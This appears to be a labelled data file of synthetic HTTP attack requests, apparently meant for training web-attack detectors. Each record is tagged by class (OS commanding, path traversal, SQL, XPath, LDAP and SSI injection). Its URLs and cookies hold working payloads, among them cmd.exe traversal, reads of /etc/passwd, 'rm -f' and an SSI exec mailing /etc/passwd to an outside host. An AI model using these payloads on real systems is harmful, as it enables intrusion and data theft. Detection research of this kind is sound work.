X-Serial-Number: 653794992925901
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35214
Start - Id: 36534
class: OsCommanding
GET /scripts/..��../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.nieYsbn.uk
Connection: close
Accept: */*;q=0.4
Accept-Charset: *
Accept-Encoding: identity, compress, deflate
Accept-Language: 775iikgs-Cdi, esxinntq-feahg3;q=0.3, ine8oom-osOTHeA;q=0.0
Cache-Control: no-cache
Client-ip: 213.233.54.110
Cookie: els=objectdR/cgc$Tllrdg|include;Ttelnet>;kalpsXEEfa=sjadr1acthn;otcoEf=iCmY
Cookie2: $Version="6"
Date: Sun, 04 Mar 07 05:27:30 UTC
ETag: W/"yNxrVMzdmzleBQUFZ"
Expect: 9nww
From: rteeiu@new9Eetlcd.org
If-Modified-Since: Sun, 27 Aug 06 19:58:50 GMT
If-Unmodified-Since: Fri, 21 Nov 08 17:48:25 CET
If-Match: "99DCnEFU1GYMcD9k"
If-None-Match: "HWXspFdFV_utEpAEBu"
If-Range: Sat, 20 Nov 04 20:30:16 CET
Max-Forwards: 8
MIME-Version: 3.0
Pragma: arhDa=trSgse
Proxy-Authorization: Basic MnNlMG9hb1U6endvb2N0cW8=
Authorization: ebie lqim0=ntd5
Range: 01232-,419-,638-
Referer: /osbhbd/neeco.swf
TE: trailers,deflate,trailers
Trailer: Via
User-Agent: Mozilla/2.8 (compatible; Konqueror/1.8; Win98; yeitsep; irlutc7)
UA-CPU: x86
UA-Disp: 0316,285,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 547x5195
Via: 6.8 www.t6wa5h6E.js, 4.7 244.206.70.132
Transfer-Encoding: compress
Upgrade: ernz/8.4, hotewo/3.0, etdeas/6.6, nbu/1.6, owgLo/3.9
Warning: 375 www.gfsleIzg.jpg:66 "hjNhnn62m" 
X-Forwarded-For: 149.92.182.203
X-Serial-Number: 55534835625911216707
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36534
Start - Id: 36983
class: LdapInjection
GET /js/hN0zOphnFvHqa/aoamss8e9/oz3SB/Vd_05yFh/rthrskzycp7sI/an1eum9unsimsva/9K-se2mi1@qYD/oa/sG/t7d.tiff?e9oi3Esbs=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.1
Host: 175.53.138.216
Connection: gjolcme
Accept: text/html;q=0.7, image/*;q=0.4, image/png
Accept-Charset: x-mac-roman, iso-8859-8;q=0.2, iso-8859-15;q=0.2, x-mac-arabic, us-ascii
Accept-Encoding: *
Accept-Language: sigDoess-sds;q=0.3, cmnux-7yzn, o-eLr;q=0.0
Cache-Control: min-fresh=679
Client-ip: 206.238.216.53
Cookie: imscriptO21YtCH-=g
Cookie2: $Version="434"
Date: Thu, 03 Aug 06 18:20:32 UTC
ETag: W/"YZcyTj4_d3_1LAB"
Expect: 100-continue
From: 4t9lsozn@n1ns8ofqic.ch
If-Modified-Since: Thu, 23 Dec 04 01:47:36 GMT
If-Unmodified-Since: Fri, 18 Aug 06 02:46:42 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 0366
MIME-Version: 4.9
Pragma: 2usrNWw=rmJ
Proxy-Authorization: Digest nonce
Authorization: Basic YVJlcnpkOnRkY2JoZA==
Range: 84-,-422477,1197-5319
Referer: /2setb.php3
TE: deflate,trailers,chunked
Trailer: Max-Forwards
User-Agent: r0nnzto/6.2
UA-CPU: MIPS
UA-Disp: 2667,8228,8
UA-Color: color8
UA-Pixels: 654x7541
Via: 3.2 www.onermn1l.png:2294
Transfer-Encoding: compress
Upgrade: m2cnia/0.2, h1ebb/7.9
Warning: 330 236.251.100.102 "4xln" "Thu, 31 Mar 05 03:35:22 UTC"
X-Forwarded-For: 159.94.130.144
X-Serial-Number: 0781389574649
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 36983
Start - Id: 35719
class: XPathInjection
GET /GaconnectN1miM2ao90/itatfioguurhpiyeiu/pNX5fjqr/mxrtvsedsgri/NqW/os1WCXWwYd.mdb?hAc=processing-instructionOwsvar&lxmvyeedmlx=pdbdAraezmymN&aelegosi=crisl&pprxersu=2rn&0p=9dooe%27%5D+++++%7C++++P+++%7C++++%2F%2Fuser%5B+name%2Ftext%28%29+++%3D%27on&tLihze=212919086&k9yXiSrorh9=kcat&deCm8pcatjun3l=9N1sto&hh2aidaseez4i=ibeMwsQ HTTP/1.1
Host: www.cqaeifsre1.com
Connection: abtt
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: nu-ere;q=0.1, f7uGe-B5ew, aoho-2h, t2atrwo-q, tys-LnatzN;q=0.4
Cache-Control: max-stale=87
Client-ip: 77.125.12.174
Cookie: suctdehsisY=9o= 
Cookie2: $Version="10"
Date: Mon, 08 Jan 07 22:13:27 CET
ETag: W/"mZF-ns0Ok3629vIwy"
Expect: 100-continue
From: p1tia@Pqapltwu.it
If-Modified-Since: Wed, 08 Apr 09 03:58:16 UTC
If-Unmodified-Since: Sun, 12 Aug 07 01:33:56 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 01 Feb 09 04:20:41 UTC
Max-Forwards: 34
MIME-Version: 8.0
Pragma: noDSneiR=en
Proxy-Authorization: Digest nonce
Authorization: NTLM aXg5bm5mbmVyc2hlOWV3aGh0bDI2YmNPaWJ1ZW9ycHlybmUybmVoaWhlbm9oYQ==
Range: 5225-,8-9,1-
Referer: http://www.oniieplS.st/Hhrlsww/ser9Oso.sh
TE: chunked;q=0.9,chunked
Trailer: TE
User-Agent: sPdo/2.8.2
UA-CPU: Sparc
UA-Disp: 453,3007,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 161x6887
Via: HTTP/5.9 www.0rwrNh.jpg:7, yude/2.0 10.38.47.102:78
Transfer-Encoding: compress
Upgrade: d3ec/2.6, tifat/9.6
Warning: 550 www.hfiueaes.shtml "mhtjtnssennQ8" "Fri, 14 Nov 08 07:02:27 UTC"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 727389738621693748
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35719
Start - Id: 46139
class: PathTransversal
GET /2sZ6SBfUgq/jBL/Eethori/mIJrs6hbX/mLOUV0wkmdTaccess_log5u/wrevcfoSsae7eh1wr/ENOand@n_csMQ.sh?3M.6oMU=iav&objectVxXKW3FiAboot.ini=oI1ntc8n+e&tobla=yeia2&qIhepriclP=qb&wsjeIr=pU.hkUfjy4&rem=84876&ztTpbse=7&reeA9an=675557&asNvnMot6u=714052&sPMldtxs1yo=292&opnieDid=..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fversion&q7=13&Rmnsow4cwt=dghct3 HTTP/1.1
Host: www.qO5OecGE.gov:80
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.6
Accept-Encoding: compress, identity;q=0.0, gzip;q=0.5
Accept-Language: *;q=0.4
Cache-Control: no-transform
Client-ip: 219.211.206.215
Cookie: dymt=hxm;Ui3ya5Jrc=ftiahq1 2eihgrhttpireyx
Cookie2: $Version="5"
Date: Fri, 21 Mar 08 01:23:57 CET
ETag: W/"@gclfMBVckCyYv5PiJh"
Expect: 100-continue
From: rnis7ym@dolsohsitn.org
If-Modified-Since: Sun, 08 Oct 06 06:34:23 GMT
If-Unmodified-Since: Fri, 24 Aug 07 15:01:47 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 28 Sep 05 18:44:33 GMT
Max-Forwards: 755
MIME-Version: 3.9
Pragma: s='ttH'
Proxy-Authorization: NTLM ZmtlMG53bm9pc3N0cDR1aWlhbmF2b2FkaGM1aW5ldGhk
Authorization: Basic OWJvYWJ5YWE6aGFzYXA=
Range: -526467,43-,829-431383
Referer: http://www.raeOys.org/aRna/hxletwit/shTixio/laaP/msae3.js
TE: chunked,deflate,chunked
Trailer: Transfer-Encoding
User-Agent: Mozilla/2.4 (Windows; U; Win98 6.0; rE-yn; rv:2.7.8) Gecko/85218003
UA-CPU: x86
UA-OS: Windows NT
Via: 4.8 100.17.179.7, HTTP/7.0 58.88.126.188, ticw/5.1 www.rtlY6.shtml
Transfer-Encoding: gzip
Upgrade: 4sr0z/5.8, 5eIsba/5.8, lviujp/4.0, arJ2h/2.1, fgge/2.5
X-Serial-Number: 678023085
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46139
Start - Id: 43400
class: OsCommanding
GET /ppZkriX/eoeheikoBDvagr/nbiu/anoFiconrucswltne/F0RFZ_jkwgetiIlLz/cZv/h76MEbp9NflYH8/LgS.shtml?ornieElrenn4=8105834&9I-vk=imelssFO&gbeenaEeluDih=rm+++-f++%2Ftmp%2FR++%7C&sm=oiiE&Nw5H=5510&oiMrlir=tnrE&oontnheole=7616&bssp52totesf=y7+%3Ctrtlso%5DAdprocessing-instructiong HTTP/1.0
Host: www.redathieee.de:80
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.9
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-transform
Client-ip: 223.63.113.33
Cookie: lte=9dd;eqbuif5cadbu=llk5wwP@y;6laioHuecsleus=97;OoMbbwXqNXGk=amTeinnw;enodsfeoittt=oE
Cookie2: $Version="5"
Date: Wed, 21 Feb 07 09:51:18 CET
ETag: W/"FBRRehdBHitCX2E"
Expect: n0nee
From: su7olsim@shSdnne.cz
If-Modified-Since: Thu, 01 Oct 09 13:32:51 GMT
If-Unmodified-Since: Sat, 04 Oct 08 08:21:27 GMT
If-Match: "d30xvdIrjFZxaS-v2WxE"
If-None-Match: "sA9an9x51rnIZvRAc"
If-Range: Sun, 12 Sep 04 22:37:09 GMT
Max-Forwards: 3
MIME-Version: 7.7
Pragma: cw=au
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest uri=http://mertS.cz/iitepr/E6ydsge.msf
Range: -4315,8885-439,063-
Referer: /aeEAa0/ddbwH/oirrh.exe
TE: chunked;q=0.3
Trailer: If-Range
User-Agent: Mozilla/7.5 (Windows; U; Win98 0.9; tI-pa; rv:4.6.9) Gecko/34363605
UA-CPU: StrongARM
UA-Disp: 3207,5717,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 9788x122
Via: lEeSkx/2.6 23.132.231.103, cho/3.1 54.194.148.4:13
Transfer-Encoding: identity
Upgrade: zos/3.8, LrxEi/5.1
Warning: 667 www.eekudeq.shtml "ep6tpihnare" 
X-Forwarded-For: 207.33.218.68
X-Serial-Number: 64752723331418038
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 43400
Start - Id: 40084
class: SSI
GET /oe6naruj2jdpeo/ldys/ntope3dtoliOnE/stnMyf/5idxO-wY/AolS/icvc5O.hVjmne4.SH.l..html?tapotbnlm1fd=%3C%21--++%23exec++++cmd%3D%22%2Fbin%2Fmail++++qt9ul80nt.com++%3C++++%2Fetc%2Fpasswd%22--%3E&eoi7m=0Lg7h-DeNQq&6cso3l=alike%3DO HTTP/1.0
Host: 94.20.151.162:372
Connection: keep-alive
Accept: text/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: max-stale
Client-ip: 126.38.105.123
Cookie: gal4eWrb2n=9;ontaoe8jpe6=armxydghetsaw1;E0poidsdrw=ioconnect;uqyj=62;uTthHbt=315680;tsnbhret5wn=a
Cookie2: $Version="080"
Date: Wed, 18 Aug 04 06:01:49 UTC
ETag: W/"t_9Ac4oG2tQdKAOiS0"
Expect: iotagppj=M2nn;eceo=idattnde
From: eolu8j@aioa.fr
If-Modified-Since: Sun, 23 Aug 09 23:08:47 GMT
If-Unmodified-Since: Mon, 28 Feb 05 11:02:59 CET
If-Match: "Cc@XhyY16axHw2-0"
If-None-Match: "SVYAoxW5d9NmkPUp"
If-Range: Thu, 14 Sep 06 02:21:09 CET
Max-Forwards: 64
MIME-Version: 7.5
Pragma: no-cache
Proxy-Authorization: mshe trCer=de1seo
Authorization: NTLM c29kZ2NpaXNhOWVuYmVvcmVpczZ0QmFTc29pcmkxZm9zZXRhdg==
Range: -170
Referer: /kD3atroc/r0eoa/igsle3nr/i8dvnuhd/knOs.wmn
TE: gzip,trailers
Trailer: Transfer-Encoding
User-Agent: hyhudrieWtiusofer
UA-CPU: MIPS
UA-Disp: 952,4343,8
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 0944x596
Via: HTTP/9.3 249.51.212.194, FTP/5.4 www.hf3oyro.html
Transfer-Encoding: Redce
Upgrade: uts3/8.2, hd4uvh/2.4, a6sol/2.3, yce/9.7, cnsH/1.9
Warning: 972 46.77.187.29 "samietonOs6ar8c" 
X-Forwarded-For: 64.201.70.142
X-Serial-Number: 9018401167222078
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40084
Start - Id: 44351
class: OsCommanding
GET /scripts/..�/../winnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.i7oeopb.com
Connection: close
Accept: */*;q=0.6
Accept-Charset: *;q=0.0
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: min-fresh=00233
Client-ip: 253.153.154.72
Cookie: isvhnienixoN8to=eGJZ_Ghj;Tisnlm=012323
Cookie2: $Version="2"
Date: Sat, 07 Aug 04 19:05:41 UTC
ETag: W/"@eu7gXfkXoFcRqbVki6"
Expect: 100-continue
From: oehrc@o8se.com
If-Modified-Since: Sun, 29 Jun 08 22:25:59 UTC
If-Unmodified-Since: Fri, 01 Dec 06 03:19:01 UTC
If-Match: "GJMFDmKTB_d_BJ8FQB"
If-None-Match: *
If-Range: "FxaYGHFY7PnQFZ4_"
Max-Forwards: 04
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: iHauOk iIeethi7=3ndhh
Authorization: Digest username="rneutiaD"
Range: -61939,-108
Referer: /todetk/lpft/dp7iuxyr.css
TE: gzip,gzip
Trailer: Max-Forwards
User-Agent: Mozilla/1.5 (X11; U; Linux i386 0.5; tb-Nb; rv:7.1.8) Gecko/41894270
UA-CPU: x86
UA-Disp: 5843,217,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 673x399
Via: 3.3 www.nea5ttS.css, sywoe/1.4 19.129.86.156:6, 8.9 73.48.109.8
Transfer-Encoding: deflate
Upgrade: 4et/8.8, is0/1.7, mseCwu/8.0
Warning: 732 www.nidnAqoh.js "estaore5gordngon0ar" "Fri, 26 Nov 04 13:07:04 GMT"
X-Forwarded-For: 179.136.110.96
X-Serial-Number: 7714827508800
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44351
Start - Id: 43780
class: OsCommanding
GET /scripts/file.bat" & dir c:/ .com? HTTP/1.1
Host: 112.114.187.143:80
Connection: close
Accept: application/*, text/html
Accept-Charset: iso-8859-4, x-mac-chinesesimp
Accept-Encoding: compress;q=0.6, gzip;q=0.3
Accept-Language: oe-aamrrR
Cache-Control: min-fresh=31950
Client-ip: 111.17.94.212
Cookie: bgin7im=asl"apacsdrop"atO/ 
Cookie2: $Version="47"
Date: Mon, 25 Apr 05 24:16:42 GMT
ETag: W/"AMC5ZOlrnU7y1Mew"
Expect: aetnnif=Omsa3m
From: nrfbhece@hbiiwgu.org
If-Modified-Since: Tue, 08 Jun 04 18:22:45 CET
If-Unmodified-Since: Tue, 27 Oct 09 07:02:17 GMT
If-Match: "XhMLQzAyv1sJ7vEf"
If-None-Match: "LVJusHwIDayfDjdYfkBz"
If-Range: Mon, 09 Aug 04 08:31:48 CET
Max-Forwards: 1
MIME-Version: 7.5
Pragma: hria=r3ttds
Proxy-Authorization: Digest opaque="leSssie"
Authorization: NTLM YTc1aXNtbmgyZWE5c29vUG9vZGRuaGVlcGVnc3V0aWg=
Range: 10571-03
Referer: /eltute/lur9p.php
TE: trailers,trailers,trailers
Trailer: From
User-Agent: Mozilla/5.1 (Machintosh; U; PPC 4.8; na-lh; rv:0.2.4) Gecko/40409331
UA-CPU: Sparc
UA-Disp: 624,195,16
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 877x3920
Via: 0.1 84.137.108.135:115, 7.5 www.al0m.js, FTP/9.4 www.tigtruei.html:36627
Transfer-Encoding: gzip
Upgrade: I0e/5.0, he1tw/5.8, cacYt/4.6, L6nei6/8.5
Warning: 658 www.Hscsmktn.js:3 "stszn923barrtxs" "Thu, 16 Oct 08 07:29:39 UTC"
X-Forwarded-For: 144.180.167.11
X-Serial-Number: 026026261334603
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 43780
Start - Id: 35714
class: XPathInjection
GET /04/eGaL/sodeeoghbcnhSfnersra/eoEpqd/g0BTMFt29JLHZ/gB_h/ircs6loscWopihE9hHot/i99DBnGaX2PR2JXe/t8xpMLb0AUYSpH/Es/t./Ove.swf?eb5=onnhO2sj%27++++or+++path%2Fchild%3A%3Anode%28%29%5Bposition%28%29%3DN%5D++++or++%27rcasjm%27++++%3D%27 HTTP/1.0
Host: www.w9fuo.uk:8
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: deflate
Accept-Language: *;q=0.1
Cache-Control: no-transform
Client-ip: 126.207.129.28
Cookie: suctdehsisY=9o= 
Cookie2: $Version="577"
Date: Fri, 02 Jul 04 05:51:11 CET
ETag: W/"3V3tBdlDozt7JvZcGC"
Expect: 100-continue
From: p1tia@Pqapltwu.it
If-Modified-Since: Sat, 09 Aug 08 12:20:43 CET
If-Unmodified-Since: Sat, 18 Apr 09 09:39:41 CET
If-Match: "oVDr5C2uImBrOue"
If-None-Match: *
If-Range: *
Max-Forwards: 198
MIME-Version: 8.0
Pragma: 6tlirn=dI99Re
Proxy-Authorization: Basic ZXllYTc6dHNuMA==
Authorization: Digest nonce
Range: 5225-,8-9,1-
Referer: http://www.ddefEhf.biz/xinqoi/diesw.rar
TE: trailers,deflate
Trailer: TE
User-Agent: r3mcato/9.0.0.6.2
UA-CPU: Sparc
UA-Disp: 453,3007,16
UA-OS: Win95
UA-Color: color32
UA-Pixels: 161x6887
Via: HTTP/5.9 www.0rwrNh.jpg:7, yude/2.0 10.38.47.102:78
Transfer-Encoding: soea
Upgrade: d3ec/2.6, tifat/9.6
Warning: 793 32.218.57.169 "eazenA2aeien9eE9jtir" "Sun, 17 Jan 10 06:57:02 CET"
X-Forwarded-For: 171.203.103.227
X-Serial-Number: 727389738621693748
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35714
Start - Id: 36086
class: PathTransversal
GET /pGYocawjabqrgp/erS/uFQJ25OfXaKDIzJfma1Q/t-jFIjUu2/tnqiuwhr9rcttel/5nlde9Oadun/ndtustedtn0gdw7B/PCKzgL/c_shutdownvQd_Vh/8Terfu/oiUUrt/uvlbaV0PHcZOxnpN6m.jpeg?8VDXp67hqGS=al0ete5ec0oh&hhsgt6eee7zt7cU=n%3A%5Cwinnt%5Cboot.ini&reNraeoHsE=mxr&38mcejthuo=tsevalt%2B HTTP/1.1
Host: www.cnenBsdvCr.uk
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: *;q=0.4
Accept-Language: d-Snat;q=0.3, 7hg-h
Cache-Control: min-fresh=1828
Client-ip: 239.15.78.97
Cookie: psnenld=vdoo;ieahtSscyaetN=iyh;Azezcrok0tfnthh=Mprac5nrbrs8clss;Trr7sa=99302214;dr2lams3lbiarl=391615156
Cookie2: $Version="98"
Date: Fri, 25 Dec 09 07:48:26 UTC
ETag: "7fLBlcqP1.G7Uml"
Expect: 100-continue
From: 2srfon@a2wsst04Ft.cz
If-Modified-Since: Mon, 24 Mar 08 01:19:56 GMT
If-Unmodified-Since: Mon, 26 Mar 07 01:15:47 GMT
If-Match: "pJAnMs@qp5xjKKVe"
If-None-Match: *
If-Range: Wed, 30 Sep 09 18:46:51 UTC
Max-Forwards: 604
MIME-Version: 8.7
Pragma: m='plP90'
Proxy-Authorization: Digest username="ftps"
Authorization: NTLM dFNsaGdwcnNzbUVlcnR5ZWVpbGFtbzdyZXRpZW96bHBub2l6c25n
Range: 580617-399630,-49399
Referer: http://haax.be/tHnrot/vnwN/16kjq4ee/slftzocl/wnsead6.ace
TE: trailers,deflate;q=0.7,trailers
Trailer: Host
User-Agent: Mozilla/8.6 (compatible; Konqueror/3.0; Open BSD i386; and1nammt; abageure)
UA-CPU: Sparc
UA-Disp: 6269,3972,32
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 039x0543
Via: 2.7 101.14.29.209:9
Transfer-Encoding: gzip
Upgrade: dnent/3.0, auXt/9.5
Warning: 647 231.206.148.64:01 "5tdtn" 
X-Forwarded-For: 67.242.104.199
X-Serial-Number: 0275337100162
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36086
Start - Id: 36304
class: PathTransversal
GET /tgJup@0/tVGsfBQIYmz@s82iK/tAk4NPSp/sC@Tl1LNa75LC2wua/tvWw-vpPj0opCt/7Ouz7i9ce4h0t3wts/trnirheieLodarin/olxmniHyYtCskh.swf?titllu=ezouybchuesn&eTthrCts=986&SAja=sVvt40SIm&rafhhqniqono9=583&IgmiecEn=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd&aotsT8rts=ml%5Cusr9ootmpaxp_&jLdos=U HTTP/1.0
Host: www.oort4ten.de:0032
Connection: rteoJidn
Accept: application/postscript
Accept-Charset: koi8-r, cp-936;q=0.7, x-mac-greek;q=0.8, iso-8859-9;q=0.5
Accept-Encoding: compress, identity, gzip, deflate;q=0.7, deflate;q=0.0
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 145.8.91.154
Cookie: aeohhr=a -;deaehsrra=9968;alea43m=[>lib;cjdfmah=dnD\
Cookie2: $Version="878"
Date: Mon, 14 Nov 05 08:53:08 CET
ETag: "PR@C.gH8sSbya5og"
Expect: 100-continue
From: Ai3uSa@urpega.be
If-Modified-Since: Sun, 04 May 08 06:11:35 GMT
If-Unmodified-Since: Thu, 29 Dec 05 17:09:05 GMT
If-Match: "pV61aumhgieINFT"
If-None-Match: *
If-Range: Mon, 14 Mar 05 10:45:32 CET
Max-Forwards: 43
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic dWRVMWF0QWg6bnlwc3Q0ag==
Authorization: mr9em ce1x=a9es7s
Range: 23041-83,-41,574-6
Referer: http://aashe7.cz/tub3mah/zomoat/klig8/vnwIie.nsf
TE: deflate;q=0.8,deflate,gzip
Trailer: Accept-Encoding
User-Agent: ePkUC19Z http://www.meeneA.com
UA-CPU: MIPS
UA-Disp: 505,9391,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 645x5981
Via: 5.8 92.247.3.169:3, 5.9 www.5stae4e.jpg, 2.3 140.214.24.162
Transfer-Encoding: reHno
Upgrade: oafi/4.5
Warning: 925 www.seESe.gif "aoh3bha8hrc" 
X-Forwarded-For: 142.213.134.120
X-Serial-Number: 10989646571343616
----: --------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 36304
Start - Id: 39482
class: SSI
POST /fP.iijpSMl-.28SW3U/doItehhshmsslyerw/dnaltmtiicrrud/nlRxBTvSpPas5i/a8hdmtas.jpeg? HTTP/1.0
Content-Length: 276
Content-Language: nzE
Content-Encoding: deflate
Content-Location: /6hcoeesc/hEmepwr6/SjoEpc.msf
Content-MD5: bnRwZGVaaHRudXJzY2wxaQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 05 Jan 04 04:01:51 CET
Last-Modified: Tue, 23 Nov 04 24:13:19 GMT
Host: 199.224.251.203
Connection: keep-alive
Accept: video/*, text/html;q=0.4
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: min-fresh=7
Client-ip: 128.206.102.122
Cookie: Gwgetsock_streamjusrOigrjK=sprn;obzmstoss6i=nG7LCL;rrhi=1353079;lPzhttpCR3=<!--#echo var="date_gmt"-->
Cookie2: $Version="8"
Date: Tue, 03 Apr 07 11:24:27 CET
ETag: W/"8wf2.lQjUcaE8GJesoy"
Expect: 100-continue
From: etna6ghR@shets.ch
If-Modified-Since: Tue, 02 Jun 09 10:50:19 UTC
If-Unmodified-Since: Mon, 06 Sep 04 13:33:12 UTC
If-Match: "vbNlkFSzUc8hF8@"
If-None-Match: "8ehW8ZK5Z_SyyEjc89"
If-Range: Thu, 01 Apr 10 10:47:54 CET
Max-Forwards: 58
MIME-Version: 6.7
Pragma: no-cache
Authorization: Digest qop=auth-int
Range: 27876-645677,2-,93777-
Referer: http://www.0h4etuOt.fr/spNriol/yrkz2d5i/rueoaeO/sse51i.js
TE: chunked;q=0.7,trailers
Trailer: If-Modified-Since
User-Agent: itliheotzQewlbteyae
UA-CPU: MIPS
UA-Disp: 0825,547,16
UA-Color: color8
UA-Pixels: 890x8709
Via: HTTP/0.6 www.dne9as.gif:72222, HTTP/4.8 www.SrRwpb3e.htm:3
Transfer-Encoding: gzip
Upgrade: orrhwl/0.7, tca0e/0.7
Warning: 917 16.207.105.181 "mish" "Fri, 20 Mar 09 11:49:12 GMT"
X-Serial-Number: 6016144
----: ------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SamtxxNfiweho=689&xia=mto&56@jvwKftmpVQ=eNl&nrrLctihrgr5=eTwhere\ueScYenmi&boa=8699&r7lndErrgtlsd2=qavdaoeeceacjN&trutedya9gwkyg=8491802&rlGlEoAcd=gznrYrqo&eaha=liIAyi&t2loabTi=https&bdegG6alt=tIo&k4edoo=hyls&nt6Htiytoemi=tLt-0Xm3Qrt&pyer9Ksee=is &8id6okg=bio3eeejEcItasdoir

End - Id: 39482
Start - Id: 41307
class: SqlInjection
GET /nxJA./wbf11F_6-1RC0p_sR/vL8Wrk_fwKq1AAL/eGo/fPcjcCydtLmC/qr@Oo@PFsm2Udc.bin?bn=9333775&oemacq5nos=iiu%7C&htautysqlgsisM6=osoLpagsNsa&qsaoaU8yfo=ea6acf1AF&t5rmO=2074140&qaf2otqoss8s=processing-instruction%7E+Ho&M9WBGR@-p=Gtiob20oni&ttA=2738&sltm=4744676&adu7=3ie4atmna&waahp=erqaeqdxeMlhisehe&it7oupshlst2=167755 HTTP/1.0
Host: www.muacsaC7z.uk
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.9
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.5
Cache-Control: no-cache
Client-ip: 121.1.44.70
Cookie: 4u=' AND     USER_NAME()='ar7is
Cookie2: $Version="17"
Date: Sat, 17 Feb 07 17:32:17 CET
ETag: W/"ezDXvSq_z5L7Oyjs"
Expect: e5ntJut=6noan
From: mdosno@ma4t.gov
If-Modified-Since: Thu, 01 Apr 10 10:30:01 CET
If-Unmodified-Since: Fri, 22 Oct 04 13:30:12 CET
If-Match: *
If-None-Match: "gm0piJOJIzW1z2IWNibY"
If-Range: Wed, 13 Jun 07 03:28:20 GMT
Max-Forwards: 190
MIME-Version: 0.5
Pragma: 08un5atu=spDti
Proxy-Authorization: rtil dsNht=zY5a
Authorization: Basic Z242aGhhOlNmV2J0bGE=
Range: 536989-,435785-66,662-
Referer: /beiu.exe
TE: trailers,trailers
Trailer: If-Modified-Since
User-Agent: 0inoh7llstai5
UA-CPU: x86
UA-Disp: 164,837,16
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 470x0638
Via: 1.6 233.201.223.121
Transfer-Encoding: deflate
Upgrade: ezemh2/3.3, srmu/0.7, m6we/2.5, errloa/7.8, ildaah/0.4
Warning: 387 186.147.86.32 "h3ea5eriueh" 
X-Forwarded-For: 5.238.202.67
X-Serial-Number: 30204361604349
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41307
Start - Id: 46103
class: PathTransversal
PUT /nnsod7teard/5u.css? HTTP/1.1
Content-Length: 316
Content-Language: sxtsiei,Eezkr
Content-Encoding: identity
Content-Location: /oseSre/eee34rt/tnnatbeA.asp
Content-MD5: dGJtZU90emVuaWZ0QXRObA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 01 May 08 20:09:10 CET
Last-Modified: Mon, 28 May 07 13:51:36 CET
Host: 78.45.8.12
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.5
Accept-Encoding: gzip;q=0.1, deflate
Accept-Language: *;q=0.2
Cache-Control: max-stale
Client-ip: 184.0.6.128
Cookie: LCphpSounionKopenqJ=309;rn=tUeXyVt7X;0eeataoqa=nodei0a51-ttls3+twtPn;y7ieITlq1ltydt=d;lensosnl4n8udn=s;tCZnm.yU==D;
Cookie2: $Version="47"
Date: Mon, 05 Apr 04 08:05:55 UTC
ETag: W/"RQOwSVWoeJGj0tXwiO"
Expect: 1riwi
From: ovnitL@umeod.net
If-Modified-Since: Sat, 13 Dec 08 17:53:18 GMT
If-Unmodified-Since: Mon, 16 Oct 06 18:24:27 CET
If-Match: "2p9_frFJ2YcaJJHmeX"
If-None-Match: "hwUzFG@BWJObkzhZv0"
If-Range: *
Max-Forwards: 260
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: NTLM N3lkaXZoNXRmcmFuaG9sYWRuYWlkbm90YW9lZHBqZUlob0F5ZU5h
Authorization: Digest uri=http://www.wuCi.uk/Ab4jhqe/loemhf/deenLse/6tobu.php
Range: -03018,-4474
